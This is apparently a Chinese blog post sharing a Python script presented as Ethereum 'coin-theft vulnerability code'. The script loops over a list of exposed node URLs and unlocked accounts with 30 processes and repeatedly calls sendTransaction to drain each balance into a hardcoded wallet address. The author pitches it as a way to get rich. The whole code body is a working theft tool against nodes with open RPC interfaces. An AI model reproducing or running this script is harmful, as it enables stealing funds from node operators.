地狱怪客

以太坊ETH盗币漏洞代码

大概那些盗币原理也就这样吧~
循环发送sendTransaction 命令导致对方服务器ETH余额被盗。
守株待兔一个亿不是梦。

#coding:utf-8
import time
from web3 import Web3, HTTPProvider
import multiprocessing
import socket
import socks
socket.setdefaulttimeout (4)

# 启动socs5代理
#socks.set_default_proxy(socks.SOCKS5, “127.0.0.1”, 1080)
#socket.socket = socks.socksocket

def sendTransaction(web3, myeth, frometh, ether):
print(‘[转移资产]:’)
try:
Txstatus = web3.eth.sendTransaction (
{‘to’: myeth, ‘from’: frometh, ‘value’: web3.toWei (ether, “ether”)})
y = list (Txstatus)
hexbuf = ”
for m in y:
hexbuf += (‘%02x’ % m)
print (‘[转账Hash]:0x’ + hexbuf)

except Exception as e:
print (‘[sendTransaction]: ERROR! ‘ + str (e))

def loopsendTransaction(url, to, frometh, value):
try:
web3 = Web3 (HTTPProvider (url))
# 转账
sendTransaction (web3, to, frometh, value)
except Exception as e:
print (‘[loopsendTransaction]: ERROR! ‘ + str (e))

def readfile(filename):
result = []
with open (filename, ‘r’) as f:
for line in f.readlines ():
linestr = line.strip ()
linestrlist = linestr.strip (‘\n’)
linestrlist = linestrlist.strip (‘\r\n’)
if not linestrlist:
continue
result.append (linestrlist)
return result

”’
转账需要花费gas
”’
def revise_wallet(eth_wallet):
eth_wallet = float(eth_wallet)
if eth_wallet > 0.000001:
eth_wallet -= 0.000001
eth_wallet = round(eth_wallet, 7)
return eth_wallet
else:
return 0

def pojie(ethlist):
while True:
for eth in ethlist:
eth = str (eth)
eth_url, eth_account, eth_wallet, eth_crack = eth.split (‘|’)
new_wallet = revise_wallet (eth_wallet)

if new_wallet > 0:
print (‘%s %s %d’ % (eth_url, eth_account, new_wallet))
loopsendTransaction (eth_url, ‘0xdc314539d0ae3d931c7963f44b7ecb63982d7793’, eth_account, new_wallet)
time.sleep(1)

def crack():
threadnum = 30
thread_list = [] # 线程存放列表

# 读取字典
g_urlhost = readfile (‘account.txt’)
thread_list.clear ()
url_lines = len (g_urlhost)
qiege = int (url_lines / threadnum) + 1
for i in range (0, len (g_urlhost), qiege):
accountlist = g_urlhost[i:i + qiege]
t = multiprocessing.Process (target=pojie, args=(accountlist,))
thread_list.append (t)

for t in thread_list:
t.start ()

for t in thread_list:
t.join ()

if __name__ == ‘__main__’:
crack()

码字很辛苦,转载请注明来自人生在世《以太坊ETH盗币漏洞代码》

评论